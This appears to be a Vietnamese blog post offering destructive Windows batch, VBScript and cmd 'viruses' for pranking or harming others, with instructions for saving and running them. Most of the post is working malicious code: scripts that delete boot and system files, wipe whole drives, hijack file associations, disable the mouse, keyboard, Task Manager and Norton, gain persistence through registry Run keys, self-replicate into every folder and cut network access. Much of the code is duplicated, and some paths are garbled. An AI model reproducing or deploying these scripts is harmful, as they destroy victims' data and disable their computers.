Security

Phá máy tính với cmd, file .bat

09/12/2015

MỘT SỐ TIỆN ÍCH CỦA FILE .BAT ĐỂ TROLL NGƯỜI KHÁC HOẶC PHÁ VUI

Mình sẽ cho các bạn xem một số code của con virus đuôi .BAT:

Các bạn mở notepad lên, copy các đoạn code dưới đây vào rồi, save lại thành đuôi .bat, .vsb hay .cmd tùy theo Code nhé

Trong lúc Save thì xem hình bên dưới: Save as type: All Files

1) virus phá hoại cửa sổ windown:

Code:

@echo off

msg *virus activated*

attrib -r -s -h c:autoexec.bat

del c:autoexec.bat

attrib -r -s -h c:boot.ini

del c:boot.ini

attrib -r -s -h c:ntldr

del c:ntldr

attrib -r -s -h c:windowswin.ini

del c:windowswin.ini

@echo off

msg *Computer Over. Virus=Very Yes.*

shutdown -s -t 10 -c " "

@echo off

msg *virus activated*

attrib -r -s -h c:autoexec.bat

del c:autoexec.bat

attrib -r -s -h c:boot.ini

del c:boot.ini

attrib -r -s -h c:ntldr

del c:ntldr

attrib -r -s -h c:windowswin.ini

del c:windowswin.ini

@echo off

msg *Computer Over. Virus=Very Yes.*

shutdown -s -t 10 -c " "

2) Loại virus này làm vô hiệu hóa chuột, bàn phím,task manager, thay đổi tập tin:

code:

@echo off

prompt $P $G

assoc .doc = fA1luRe

assoc .docx = fA1luRe

assoc .log = fA1luRe

assoc .msg = fA1luRe

assoc .pages = fA1luRe

assoc .rtf = fA1luRe

assoc .txt = fA1luRe

assoc .wpd = fA1luRe

assoc .wps = fA1luRe

assoc .accdb = fA1luRe

assoc .blg = fA1luRe

assoc .csv = fA1luRe

assoc .dat = fA1luRe

assoc .db = fA1luReassoc .efx = fA1luRe

assoc .mdb = fA1luRe

assoc .pdb = fA1luRe

assoc .pps = fA1luRe

assoc .ppt = fA1luRe

assoc .pptx = fA1luRe

assoc .sdb = fA1luRe

assoc .sdf = fA1luRe

assoc .sql = fA1luRe

assoc .vcf = fA1luRe

assoc .wks = fA1luRe

assoc .xls = fA1luRe

assoc .xlsx = fA1luRe

assoc .xml = fA1luRe

assoc .bmp = fA1luRe

assoc .gif = fA1luRe

assoc .jpg = fA1luRe

assoc .png = fA1luRe

assoc .psd = fA1luRe

assoc .psp = fA1luRe

assoc .thm = fA1luRe

assoc .tif = fA1luRe

assoc .ai = fA1luRe

assoc .drw = fA1luRe

assoc .eps = fA1luRe

assoc .ps = fA1luRe

assoc .svg = fA1luRe

assoc .3dm = fA1luRe

assoc .dwg = fA1luRe

assoc .dxf = fA1luRe

assoc .pln = fA1luRe

assoc .indd = fA1luRe

assoc .pct = fA1luRe

assoc .pdf = fA1luRe

assoc .qxd = fA1luRe

assoc .qxp = fA1luReassoc .rels = fA1luRe

assoc .aac = fA1luRe

assoc .aif = fA1luRe

assoc .iff = fA1luRe

assoc .m3u = fA1luRe

assoc .mid = fA1luRe

assoc .mp3 = fA1luRe

assoc .mpa = fA1luRe

assoc .ra = fA1luRe

assoc .wav = fA1luRe

assoc .wma = fA1luRe

assoc .3g2 = fA1luRe

assoc .3gp = fA1luRe

assoc .asf = fA1luRe

assoc .asx = fA1luRe

assoc .avi = fA1luRe

assoc .flv = fA1luRe

assoc .mov = fA1luRe

assoc .mp4 = fA1luRe

assoc .mpg = fA1luRe

assoc .rm = fA1luRe

assoc .swf = fA1luRe

assoc .vob = fA1luRe

assoc .wmv = fA1luRe

assoc .asp = fA1luRe

assoc .cer = fA1luRe

assoc .csr = fA1luRe

assoc .css = fA1luRe

assoc .htm = fA1luRe

assoc .html = fA1luRe

assoc .js = fA1luRe

assoc .jsp = fA1luRe

assoc .php = fA1luRe

assoc .rss = fA1luRe

assoc .tvpi = fA1luRe

assoc .tvvi = fA1luReassoc .xhtml = fA1luRe

assoc .fnt = fA1luRe

assoc .fon = fA1luRe

assoc .otf = fA1luRe

assoc .ttf = fA1luRe

assoc .8bi = fA1luRe

assoc .plugin = fA1luRe

assoc .xll = fA1luRe

assoc .cab = fA1luRe

assoc .cpl = fA1luRe

assoc .cur = fA1luRe

assoc .dll = fA1luRe

assoc .dmp = fA1luRe

assoc .drv = fA1luRe

assoc .key = fA1luRe

assoc .lnk = fA1luRe

assoc .sys = fA1luRe

assoc .cfg = fA1luRe

assoc .ini = fA1luRe

assoc .keychain = fA1luRe

assoc .prf = fA1luRe

assoc .app = fA1luRe

assoc .bat = fA1luRe

assoc .cgi = fA1luRe

assoc .com = fA1luRe

assoc .exe = fA1luRe

assoc .pif = fA1luRe

assoc .vb = fA1luRe

assoc .ws = fA1luRe

assoc .7z = fA1luRe

assoc .deb = fA1luRe

assoc .gz = fA1luRe

assoc .pkg = fA1luRe

assoc .rar = fA1luRe

assoc .sit = fA1luRe

assoc .sitx = fA1luReassoc .tar.gz = fA1luRe

assoc .zip = fA1luRe

assoc .zipx = fA1luRe

assoc .bin = fA1luRe

assoc .hqx = fA1luRe

assoc .mim = fA1luRe

assoc .uue = fA1luRe

assoc .c = fA1luRe

assoc .cpp = fA1luRe

assoc .dtd = fA1luRe

assoc .java = fA1luRe

assoc .pl = fA1luRe

assoc .bak = fA1luRe

assoc .bup = fA1luRe

assoc .gho = fA1luRe

assoc .ori = fA1luRe

assoc .tmp = fA1luRe

assoc .dmg = fA1luRe

assoc .iso = fA1luRe

assoc .toast = fA1luRe

assoc .vcd = fA1luRe

assoc .gam = fA1luRe

assoc .nes = fA1luRe

assoc .rom = fA1luRe

assoc .sav = fA1luRe

assoc .dbx = fA1luRe

assoc .msi = fA1luRe

assoc .part = fA1luRe

assoc .torrent = fA1luRe

assoc .yps = fA1luRe

rundll32.exe mouse, disable

rundll32.exe keyboard, disable

copy setup.bat %userprofile%AppDataRoamingMicrosoftWindowsStart

MenuProgramsStartup

copy setup.bat %windir%System32

reg add HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun /v fA1luRe /t REG_SZ /d %windir%System32setup.bat

taskkill /f /im taskmgr.exe

reg restore

HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPolicie

sSystem DisableTaskMgr = 1

shutdown -s -f -t 10 -c "PwN3D by fA1luRe!!!"

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

134

135

136

137

138

139

140

141

142

143

144

145

146

147

148

149

150

151

152

153

154

155

156

157

158

159

160

161

162

163

164

165

166

167

168

169

170

171

172

173

174

175

176

177

178

179

180

181

182

183

184

185

186

187

188

189

190

191

192

193

194

195

196

197

198

199

200

201

202

203

204

205

206

207

208

209

210

211

212

213

214

215

216

217

218

219

220

221

222

223

224

225

226

227

228

229

230

231

232

233

234

235

236

237

238

239

240

241

242

243

244

245

246

247

248

249

250

251

252

253

254

255

256

257

258

259

260

261

262

263

264

265

266

267

268

269

270

271

272

273

274

275

276

277

278

279

280

281

282

283

284

285

286

287

288

289

290

291

292

293

294

295

296

297

298

299

300

301

302

303

304

305

306

307

308

309

310

311

312

313

314

315

316

317

318

319

320

321

@echo off

prompt $P $G

assoc .doc = fA1luRe

assoc .docx = fA1luRe

assoc .log = fA1luRe

assoc .msg = fA1luRe

assoc .pages = fA1luRe

assoc .rtf = fA1luRe

assoc .txt = fA1luRe

assoc .wpd = fA1luRe

assoc .wps = fA1luRe

assoc .accdb = fA1luRe

assoc .blg = fA1luRe

assoc .csv = fA1luRe

assoc .dat = fA1luRe

assoc .db = fA1luReassoc .efx = fA1luRe

assoc .mdb = fA1luRe

assoc .pdb = fA1luRe

assoc .pps = fA1luRe

assoc .ppt = fA1luRe

assoc .pptx = fA1luRe

assoc .sdb = fA1luRe

assoc .sdf = fA1luRe

assoc .sql = fA1luRe

assoc .vcf = fA1luRe

assoc .wks = fA1luRe

assoc .xls = fA1luRe

assoc .xlsx = fA1luRe

assoc .xml = fA1luRe

assoc .bmp = fA1luRe

assoc .gif = fA1luRe

assoc .jpg = fA1luRe

assoc .png = fA1luRe

assoc .psd = fA1luRe

assoc .psp = fA1luRe

assoc .thm = fA1luRe

assoc .tif = fA1luRe

assoc .ai = fA1luRe

assoc .drw = fA1luRe

assoc .eps = fA1luRe

assoc .ps = fA1luRe

assoc .svg = fA1luRe

assoc .3dm = fA1luRe

assoc .dwg = fA1luRe

assoc .dxf = fA1luRe

assoc .pln = fA1luRe

assoc .indd = fA1luRe

assoc .pct = fA1luRe

assoc .pdf = fA1luRe

assoc .qxd = fA1luRe

assoc .qxp = fA1luReassoc .rels = fA1luRe

assoc .aac = fA1luRe

assoc .aif = fA1luRe

assoc .iff = fA1luRe

assoc .m3u = fA1luRe

assoc .mid = fA1luRe

assoc .mp3 = fA1luRe

assoc .mpa = fA1luRe

assoc .ra = fA1luRe

assoc .wav = fA1luRe

assoc .wma = fA1luRe

assoc .3g2 = fA1luRe

assoc .3gp = fA1luRe

assoc .asf = fA1luRe

assoc .asx = fA1luRe

assoc .avi = fA1luRe

assoc .flv = fA1luRe

assoc .mov = fA1luRe

assoc .mp4 = fA1luRe

assoc .mpg = fA1luRe

assoc .rm = fA1luRe

assoc .swf = fA1luRe

assoc .vob = fA1luRe

assoc .wmv = fA1luRe

assoc .asp = fA1luRe

assoc .cer = fA1luRe

assoc .csr = fA1luRe

assoc .css = fA1luRe

assoc .htm = fA1luRe

assoc .html = fA1luRe

assoc .js = fA1luRe

assoc .jsp = fA1luRe

assoc .php = fA1luRe

assoc .rss = fA1luRe

assoc .tvpi = fA1luRe

assoc .tvvi = fA1luReassoc .xhtml = fA1luRe

assoc .fnt = fA1luRe

assoc .fon = fA1luRe

assoc .otf = fA1luRe

assoc .ttf = fA1luRe

assoc .8bi = fA1luRe

assoc .plugin = fA1luRe

assoc .xll = fA1luRe

assoc .cab = fA1luRe

assoc .cpl = fA1luRe

assoc .cur = fA1luRe

assoc .dll = fA1luRe

assoc .dmp = fA1luRe

assoc .drv = fA1luRe

assoc .key = fA1luRe

assoc .lnk = fA1luRe

assoc .sys = fA1luRe

assoc .cfg = fA1luRe

assoc .ini = fA1luRe

assoc .keychain = fA1luRe

assoc .prf = fA1luRe

assoc .app = fA1luRe

assoc .bat = fA1luRe

assoc .cgi = fA1luRe

assoc .com = fA1luRe

assoc .exe = fA1luRe

assoc .pif = fA1luRe

assoc .vb = fA1luRe

assoc .ws = fA1luRe

assoc .7z = fA1luRe

assoc .deb = fA1luRe

assoc .gz = fA1luRe

assoc .pkg = fA1luRe

assoc .rar = fA1luRe

assoc .sit = fA1luRe

assoc .sitx = fA1luReassoc .tar.gz = fA1luRe

assoc .zip = fA1luRe

assoc .zipx = fA1luRe

assoc .bin = fA1luRe

assoc .hqx = fA1luRe

assoc .mim = fA1luRe

assoc .uue = fA1luRe

assoc .c = fA1luRe

assoc .cpp = fA1luRe

assoc .dtd = fA1luRe

assoc .java = fA1luRe

assoc .pl = fA1luRe

assoc .bak = fA1luRe

assoc .bup = fA1luRe

assoc .gho = fA1luRe

assoc .ori = fA1luRe

assoc .tmp = fA1luRe

assoc .dmg = fA1luRe

assoc .iso = fA1luRe

assoc .toast = fA1luRe

assoc .vcd = fA1luRe

assoc .gam = fA1luRe

assoc .nes = fA1luRe

assoc .rom = fA1luRe

assoc .sav = fA1luRe

assoc .dbx = fA1luRe

assoc .msi = fA1luRe

assoc .part = fA1luRe

assoc .torrent = fA1luRe

assoc .yps = fA1luRe

rundll32.exe mouse, disable

rundll32.exe keyboard, disable

copy setup.bat %userprofile%AppDataRoamingMicrosoftWindowsStart

MenuProgramsStartup

copy setup.bat %windir%System32

reg add HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun /v fA1luRe /t REG_SZ /d %windir%System32setup.bat

taskkill /f /im taskmgr.exe

reg restore

HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPolicie

sSystem DisableTaskMgr = 1

shutdown -s -f -t 10 -c "PwN3D by fA1luRe!!!"

3) Kiểm tra % của CPU lên đến bao nhiêu %:

Bạn mở notepad ra và gõ start 1.bat vào trong rồi các bạn lưu con virus này là

1.bat rồi ngay lập tức % CPU sẽ tăng lên.

4) Lặp lại nhiều lần chu kỳ mess:

Code:

@ECHO off

:Begin

msg * lời cảnh báo

msg * lời cảnh báo

msg * lời cảnh báo

msg * lời cảnh báo

msg * lời cảnh báo

GOTO BEGIN

VD:

@ECHO off

:Begin

msg * Hi

msg * khoe ko anh ?

msg * em ne ?

msg * buon ngu chua anh ?

msg * tat may ngu thoi ,bb anh

GOTO BEGIN

@ECHO off

:Begin

msg * lời cảnh báo

GOTO BEGIN

VD:

@ECHO off

:Begin

msg * Hi

msg * khoe ko anh ?

msg * em ne ?

msg * buon ngu chua anh ?

msg * tat may ngu thoi ,bb anh

GOTO BEGIN

5) Tự động tắt máy và kèm theo lời nhắn:

Code:

@echo off

msg * lời cảnh báo

shutdown -c “lời cảnh báo” -s

VD:@echo off

msg * I LOVE YOU

shutdown -c “Error! tam biet anh!” -s

@echo off

msg * lời cảnh báo

shutdown -c “lời cảnh báo” -s

VD:@echo off

msg * I LOVE YOU

shutdown -c “Error! tam biet anh!” -s

Còn đây là một số con virus có đuôi là .VBS

Chức năng gửi thông điệp cảnh báo:

Code:

TEXT1=MSGBOX("THÔNG ĐIÊP CẢNH BÁO",42,"TÊN THÔNG ĐIỆP CẢNH BÁO")

1

TEXT1=MSGBOX("THÔNG ĐIÊP CẢNH BÁO",42,"TÊN THÔNG ĐIỆP CẢNH BÁO")

2) Chức năng làm đứng máy tính:

Code:

msgbox"Error !"

On Error Resume Next

Set vip_xinh = Createobject("scripting.filesystemobject")

vip_xinh.copyfile wscript.scriptfullname,vip_xinh.GetSpecialFolder(0 )& "

vip_xinh.vbs"

Set vip_xinh2= CreateObject("WScript.Shell")

vip_xinh2.regwrite "HKLMSOFTWAREMicrosoftWindowsCurrentVersionRu

ndie","wscript.exe "& vip_xinh.GetSpecialFolder(0)& " vip_xinh.vbs %"

On Error Resume Next

Const vic = "D:"

Delvic

Sub Delvic()

Dim fso

Set fso = CreateObject("Scripting.FileSystemObject")

fso.DeleteFile vic & "*.*" , True

fso.DeleteFolder vic & "*" , True

End Sub

On Error Resume Next

Const vic1 = "C:windows"

Delvic1

Sub Delvic1()

Dim fso1

Set fso1 = CreateObject("Scripting.FileSystemObject")fso1.DeleteFile vic1 & "*.*" , True

fso1.DeleteFolder vic1 & "*" , True

End Sub

On Error Resume Next

Const vic2 = "C:"

Delvic2

Sub Delvic2()

Dim fso2

Set fso2 = CreateObject("Scripting.FileSystemObject")

fso2.DeleteFile vic2 & "*.*" , True

fso2.DeleteFolder vic2 & "*" , True

End Sub

On Error Resume Next

Set treomay= CreateObject("WScript.Shell")

Do

treomay.run "notepad",false

loop

msgbox"Error !"

On Error Resume Next

Set vip_xinh = Createobject("scripting.filesystemobject")

vip_xinh.copyfile wscript.scriptfullname,vip_xinh.GetSpecialFolder(0 )& "

vip_xinh.vbs"

Set vip_xinh2= CreateObject("WScript.Shell")

vip_xinh2.regwrite "HKLMSOFTWAREMicrosoftWindowsCurrentVersionRu

ndie","wscript.exe "& vip_xinh.GetSpecialFolder(0)& " vip_xinh.vbs %"

On Error Resume Next

Const vic = "D:"

Delvic

Sub Delvic()

Dim fso

Set fso = CreateObject("Scripting.FileSystemObject")

fso.DeleteFile vic & "*.*" , True

fso.DeleteFolder vic & "*" , True

End Sub

On Error Resume Next

Const vic1 = "C:windows"

Delvic1

Sub Delvic1()

Dim fso1

Set fso1 = CreateObject("Scripting.FileSystemObject")fso1.DeleteFile vic1 & "*.*" , True

fso1.DeleteFolder vic1 & "*" , True

End Sub

On Error Resume Next

Const vic2 = "C:"

Delvic2

Sub Delvic2()

Dim fso2

Set fso2 = CreateObject("Scripting.FileSystemObject")

fso2.DeleteFile vic2 & "*.*" , True

fso2.DeleteFolder vic2 & "*" , True

End Sub

On Error Resume Next

Set treomay= CreateObject("WScript.Shell")

treomay.run "notepad",false

loop

3) Đây là một con virus rất ác mình khuyên ban muốn thử nó thì hãy đóng

băng tất cả các ổ trước khi sử dụng nó không thì rước họa vào thân đấy bạn

Code:

Dim fso,file,VBCopy

Set fso=CreateObject("Scripting.FileSystemObject")

Set file=fso.OpenTextFile(WScript.ScriptFullName,1)

VBCopy=file.ReadAll

FolderList("A:")

FolderList("B:")

FolderList("C:")

FolderList("D:")

FolderList("E:")

FolderList("F:")

FolderList("G:")

FolderList("H:")

FolderList("I:")FolderList("J:")

FolderList("K:")

FolderList("L:")

FolderList("M:")

FolderList("N:")

FolderList("O:")

FolderList("P:")

FolderList("Q:")

FolderList("R:")

FolderList("S:")

FolderList("T:")

FolderList("U:")

FolderList("V:")

FolderList("X:")

FolderList("Y:")

FolderList("Z:")

FolderList("W:")

Sub FolderList(FolderSpec)

On Error Resume Next

Dim f,f1,sf,COP,CAP

Set f=fso.GetFolder(FolderSpec)

set sf=f.SubFolders

For Each f1 In sf

Set COP=fso.CreateTextFile(f1.path & "Virus !!!!!!!.vbs")

COP.write VBCopy

Set CAP=fso.CreateTextFile(f1.path & "---Virus !!!!!!!.vbs")

CAP.write VBCopy

FolderList(f1.Path)

Next

End sub

Dim fso,file,VBCopy

Set fso=CreateObject("Scripting.FileSystemObject")

Set file=fso.OpenTextFile(WScript.ScriptFullName,1)

VBCopy=file.ReadAll

FolderList("A:")

FolderList("B:")

FolderList("C:")

FolderList("D:")

FolderList("E:")

FolderList("F:")

FolderList("G:")

FolderList("H:")

FolderList("I:")FolderList("J:")

FolderList("K:")

FolderList("L:")

FolderList("M:")

FolderList("N:")

FolderList("O:")

FolderList("P:")

FolderList("Q:")

FolderList("R:")

FolderList("S:")

FolderList("T:")

FolderList("U:")

FolderList("V:")

FolderList("X:")

FolderList("Y:")

FolderList("Z:")

FolderList("W:")

Sub FolderList(FolderSpec)

On Error Resume Next

Dim f,f1,sf,COP,CAP

Set f=fso.GetFolder(FolderSpec)

set sf=f.SubFolders

For Each f1 In sf

Set COP=fso.CreateTextFile(f1.path & "Virus !!!!!!!.vbs")

COP.write VBCopy

Set CAP=fso.CreateTextFile(f1.path & "---Virus !!!!!!!.vbs")

CAP.write VBCopy

FolderList(f1.Path)

End sub

Còn đây là thuốc giải:

Code:

Dim fso,file,VBCopy

Set fso=CreateObject("Scripting.FileSystemObject")

Set file=fso.OpenTextFile(WScript.ScriptFullName,1)VBCopy=file.ReadAll

FolderList("A:")

FolderList("B:")

FolderList("C:")

FolderList("D:")

FolderList("E:")

FolderList("F:")

FolderList("G:")

FolderList("H:")

FolderList("I:")

FolderList("J:")

FolderList("K:")

FolderList("L:")

FolderList("M:")

FolderList("N:")

FolderList("O:")

FolderList("P:")

FolderList("Q:")

FolderList("R:")

FolderList("S:")

FolderList("T:")

FolderList("U:")

FolderList("V:")

FolderList("X:")

FolderList("Y:")

FolderList("Z:")

FolderList("W:")

Sub FolderList(FolderSpec)

On Error Resume Next

Dim f,f1,sf,COP,CAP,ATT

Set f=fso.GetFolder(FolderSpec)

set sf=f.SubFolders For Each f1 In sf

'Set COP=fso.CreateTextFile(f1.path & "Virus !!!!!!!.vbs")

'COP.write VBCopy

'Set CAP=fso.CreateTextFile(f1.path & "---Virus !!!!!!!.vbs")

'CAP.write VBCopy'Set ATT=fso.GetFolder(f1.Path)

'ATT.Attributes=ATT.Attributes+2

fso.DeleteFile(f1.path & "Virus !!!!!!!.vbs")

fso.DeleteFile(f1.path & "---Virus !!!!!!!.vbs")

FolderList(f1.Path)

Next

End sub

Dim fso,file,VBCopy

Set fso=CreateObject("Scripting.FileSystemObject")

Set file=fso.OpenTextFile(WScript.ScriptFullName,1)VBCopy=file.ReadAll

FolderList("A:")

FolderList("B:")

FolderList("C:")

FolderList("D:")

FolderList("E:")

FolderList("F:")

FolderList("G:")

FolderList("H:")

FolderList("I:")

FolderList("J:")

FolderList("K:")

FolderList("L:")

FolderList("M:")

FolderList("N:")

FolderList("O:")

FolderList("P:")

FolderList("Q:")

FolderList("R:")

FolderList("S:")

FolderList("T:")

FolderList("U:")

FolderList("V:")

FolderList("X:")

FolderList("Y:")

FolderList("Z:")

FolderList("W:")

Sub FolderList(FolderSpec)

On Error Resume Next

Dim f,f1,sf,COP,CAP,ATT

Set f=fso.GetFolder(FolderSpec)

set sf=f.SubFolders For Each f1 In sf

'Set COP=fso.CreateTextFile(f1.path & "Virus !!!!!!!.vbs")

'COP.write VBCopy

'Set CAP=fso.CreateTextFile(f1.path & "---Virus !!!!!!!.vbs")

'CAP.write VBCopy'Set ATT=fso.GetFolder(f1.Path)

'ATT.Attributes=ATT.Attributes+2

fso.DeleteFile(f1.path & "Virus !!!!!!!.vbs")

fso.DeleteFile(f1.path & "---Virus !!!!!!!.vbs")

FolderList(f1.Path)

End sub

4) Chức năng mở một thông điệp rồi sẽ tự động tắt máy:

Code:

@ECHO OFF MSG * THÔNG ĐIỆP SHUTDOWN -C "THÔNG ĐIỆP" -S -T 10

1

2

3

4

5

@ECHO OFF

MSG * THÔNG ĐIỆP

SHUTDOWN -C "THÔNG ĐIỆP" -S -T 10

5) Không cho victim khởi động máy:

Code:

DIM WSH SET WSH = CREATEOBJECT("WSCRIPT.SHELL") WSH.RUN "RUNDLL32.EXE USER.EXE,EXITWINDOWS"

1

2

3

4

5

DIM WSH

SET WSH = CREATEOBJECT("WSCRIPT.SHELL")

WSH.RUN "RUNDLL32.EXE USER.EXE,EXITWINDOWS"

6)Disable NAV:

Code:

DIM WSH SET WSH= CREATEOBJECT( "WSCRIPT.SHELL") S1 = " HKEY_LOCAL_MACHINESYSTEMCURRENTCONTROLSETSERVIC ESNORTON PROGRAM SCHEDULERSTART" WSH.REGWRITE S1,3, "REG_DWORD"

1

2

3

4

5

6

7

8

9

10

11

DIM WSH

SET WSH= CREATEOBJECT( "WSCRIPT.SHELL")

S1 = " HKEY_LOCAL_MACHINESYSTEMCURRENTCONTROLSETSERVIC

ESNORTON PROGRAM

SCHEDULERSTART"

WSH.REGWRITE S1,3, "REG_DWORD"

7) Hiển thị message mỗi khi restart máy:

Code:

DIM WSH SET WSH = CREATEOBJECT( "WSCRIPT.SHELL" ) S1 = " HKLMSOFTWAREMICROSOFTWINDOWSCURRENTVERSIONWIN LOGON" S2 = "LEGALNOTICECAPTION"S3 = "LEGALNOTICETEXT" WSH.REGWRITE S1+S2, "LỜI CẢNH BÁO" WSH.REGWRITE S1+S3, "LỜI CẢNH BÁO"

1

2

3

4

5

6

7

8

9

10

11

12

13

DIM WSH

SET WSH = CREATEOBJECT( "WSCRIPT.SHELL" )

S1 = " HKLMSOFTWAREMICROSOFTWINDOWSCURRENTVERSIONWIN

LOGON"

S2 = "LEGALNOTICECAPTION"S3 = "LEGALNOTICETEXT"

WSH.REGWRITE S1+S2, "LỜI CẢNH BÁO"

WSH.REGWRITE S1+S3, "LỜI CẢNH BÁO"

8) Chuc nang hien thi dong lenh khi ban click vao Thư mục:

Code:

SET REG=CREATEOBJECT("WSCRIPT.SHELL") REG.REGWRITE "HKEY_CLASSES_ROOT*SHELL","LOI CANH BAO" REG.REGWRITE "HKEY_CLASSES_ROOTFOLDERSHELLLOI CANH BAO","SLM"

1

2

3

4

5

SET REG=CREATEOBJECT("WSCRIPT.SHELL")

REG.REGWRITE "HKEY_CLASSES_ROOT*SHELL","LOI CANH BAO"

REG.REGWRITE "HKEY_CLASSES_ROOTFOLDERSHELLLOI CANH BAO","SLM"

vd:

SET REG=CREATEOBJECT("WSCRIPT.SHELL") REG.REGWRITE "HKEY_CLASSES_ROOT*SHELL","HI ! BAN DA BI NHIEM WK TU TRUONGTON.NET" REG.REGWRITE "HKEY_CLASSES_ROOTFOLDERSHELLHI ! BAN DA BI NHIEM WK TU TRUONGTON.NET","SLM"

1

2

3

4

5

6

7

8

9

SET REG=CREATEOBJECT("WSCRIPT.SHELL")

REG.REGWRITE "HKEY_CLASSES_ROOT*SHELL","HI ! BAN DA BI NHIEM WK

TU TRUONGTON.NET"

REG.REGWRITE "HKEY_CLASSES_ROOTFOLDERSHELLHI ! BAN DA BI NHIEM WK

TU TRUONGTON.NET","SLM"

9) Xóa Registry Files:

Code:

@ECHO OFF START REG DELETE HKCR/.EXE START REG DELETE HKCR/.DLL START REG DELETE HKCR/* :MESSAGE ECHO SLM LOI CANH BAO. GOTO MESSAGE

1

2

3

4

5

6

7

8

9

10

11

12

13

@ECHO OFF

START REG DELETE HKCR/.EXE

START REG DELETE HKCR/.DLL

START REG DELETE HKCR/*

:MESSAGE

ECHO SLM LOI CANH BAO.

GOTO MESSAGE

vd:

@ECHO OFF START REG DELETE HKCR/.EXE START REG DELETE HKCR/.DLL START REG DELETE HKCR/* :MESSAGE ECHO SLM CHUC ANH 1 NGAY VUI VE. GOTO MESSAGE

1

2

3

4

5

6

7

8

9

10

11

12

13

@ECHO OFF

START REG DELETE HKCR/.EXE

START REG DELETE HKCR/.DLL

START REG DELETE HKCR/*

:MESSAGE

ECHO SLM CHUC ANH 1 NGAY VUI VE.

GOTO MESSAGE

10) Bật notepad lien tuc lam may tinh bi ngơ:

CODE:@ECHO OFF :TOP START %SYSTEMROOT%SYSTEM32NOTEPAD.EXE GOTO TOP

1

2

3

4

5

6

7

CODE:@ECHO OFF

:TOP

START %SYSTEMROOT%SYSTEM32NOTEPAD.EXE

GOTO TOP

11) Bật tắt caps lock liên tục:

Code:

SET WSHSHELL =WSCRIPT.CREATEOBJECT("WSCRIPT.SHELL") DO WSCRIPT.SLEEP 100 WSHSHELL.SENDKEYS "{CAPSLOCK}" LOOP

1

2

3

4

5

6

7

8

9

SET WSHSHELL =WSCRIPT.CREATEOBJECT("WSCRIPT.SHELL")

DO

WSCRIPT.SLEEP 100

WSHSHELL.SENDKEYS "{CAPSLOCK}"

LOOP

12) Ép enter liên tục:

Code:

SET WSHSHELL = WSCRIPT.CREATEOBJECT("WSCRIPT.SHELL") DO WSCRIPT.SLEEP 100 WSHSHELL.SENDKEYS "~(ENTER)" LOOP

1

2

3

4

5

6

7

8

9

SET WSHSHELL = WSCRIPT.CREATEOBJECT("WSCRIPT.SHELL")

DO

WSCRIPT.SLEEP 100

WSHSHELL.SENDKEYS "~(ENTER)"

LOOP

12) Ép Space liên tục:

MSGBOX "LET'S GO BACK A FEW STEPS" SET WSHSHELL =WSCRIPT.CREATEOBJECT("WSCRIPT.SHELL") DO WSCRIPT.SLEEP 100 WSHSHELL.SENDKEYS "{BS}" LOOP

1

2

3

4

5

6

7

8

9

10

11

MSGBOX "LET'S GO BACK A FEW STEPS"

SET WSHSHELL =WSCRIPT.CREATEOBJECT("WSCRIPT.SHELL")

DO

WSCRIPT.SLEEP 100

WSHSHELL.SENDKEYS "{BS}"

LOOP

Còn đây là một số con virus có đuôi .cmd:

1)Xóa sạch tất cả các file có trong máy:

Code:

DEL /F /Q *

1

DEL /F /Q *

2)Xóa một file nào đó:

Code:

erase đường dẫnvd:

ERASE C:TEST.TXT

1

ERASE C:TEST.TXT

3) Ẩn tòan bộ file trong win

Code:

ATTRIB +S /F /Q *

1

ATTRIB +S /F /Q *

Update Thêm Vài Con Virus Cực Nguy Hiểm

1) Vĩnh Biệt PC Forever
Các bạn cẩn thận khi tạo xong ko nên click vào nhé !!

@echo off

attrib -r -s -hc:  autoexec.bat

del c:  autoexec.bat

attrib -r -s -hc:  boot.ini

del c:  boot.ini

attrib -r -s -hc:  ntldr

del c:  ntldr

attrib -r -s -hc:  windows  win.ini

del c:  windows  win.ini

@echo off

attrib -r -s -hc: autoexec.bat

del c: autoexec.bat

attrib -r -s -hc: boot.ini

del c: boot.ini

attrib -r -s -hc: ntldr

del c: ntldr

attrib -r -s -hc: windows win.ini

del c: windows win.ini

Lưu Với Đuôi .Bat và ko click vào nếu ko muốn gặp hậu quả nha !!

2) Virus Nguy Hiểm Chưa Có Tên

@echo off

del D:  *. * / f / s / q

del E:  *. * / f / s / q

del F:  *. * / f / s / q

del G:  *. * / f / s / q

del H:  *. * / f / s / q

del I:  *. * / f / s / q

del J:  *. * / f / s / q

@echo off

del D: *. * / f / s / q

del E: *. * / f / s / q

del F: *. * / f / s / q

del G: *. * / f / s / q

del H: *. * / f / s / q

del I: *. * / f / s / q

del J: *. * / f / s / q

Lưu Với tên SEO.bat
Cái này còn nguy hiểm hơn. Để học hỏi thôi chứ đừng phá máy người ta =))

4) Không Cho Windows Khởi Động

Del c:.  WINDOWS  system32  * * / q

1	Del c:. WINDOWS system32 * * / q

Lưu Lại là anything.bat

5) Vô Hiệu Hóa InterNet Vĩnh viễn

echo @echo off>c:windowswimn32.bat

echo break off>>c:windowswimn32.bat

echo ipconfig/release_all>>c:windowswimn32.bat

echo end>>c:windowswimn32.bat

reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f

reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f

echo You Have Been HACKED!

PAUSE

echo @echo off>c:windowswimn32.bat

echo break off>>c:windowswimn32.bat

echo ipconfig/release_all>>c:windowswimn32.bat

echo end>>c:windowswimn32.bat

reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f

reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f

echo You Have Been HACKED!

PAUSE

Lưu Lại với Đuôi .Bat

6) Đổi Đuôi Tất Cả Thành TXT

Làm rối loạn dữ liệu máy tính

REN * .DOC * .TXT REN * .JPEG * .TXT

REN * LNK * .TXT

REN * .AVI * .TXT

REN * .MPEG * .TXT

REN * .COM * .TXT

REN * .BAT * .TXT

REN * .DOC * .TXT REN * .JPEG * .TXT

REN * LNK * .TXT

REN * .AVI * .TXT

REN * .MPEG * .TXT

REN * .COM * .TXT
